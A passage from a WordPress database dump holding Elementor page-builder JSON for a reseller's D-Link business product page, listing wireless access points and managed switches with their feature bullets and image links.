Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7484,3398,'_wp_page_template','template-fullwidth.php'),(7485,3398,'_elementor_template_type','post'),(7486,3398,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless 